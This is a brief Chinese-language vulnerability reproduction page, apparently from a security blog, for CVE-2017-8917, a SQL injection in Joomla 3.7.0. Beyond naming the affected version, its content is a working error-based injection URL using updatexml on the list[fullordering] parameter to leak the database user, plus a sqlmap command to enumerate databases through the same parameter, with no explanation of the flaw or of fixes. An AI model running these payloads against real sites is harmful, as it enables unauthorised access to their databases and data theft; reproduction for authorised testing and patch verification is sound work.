010-(CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞

# (CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞

### 一、漏洞简介

### 二、漏洞影响

Joomla 3.7.0

### 三、复现过程

“`
http://url:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
“`

![](/static/lingzu/images/15899564899358.png)

**补充**

“`bash
sqlmap -u “http://url/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” –risk=3 –level=5 –random-agent –dbs -p list[fullordering]
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容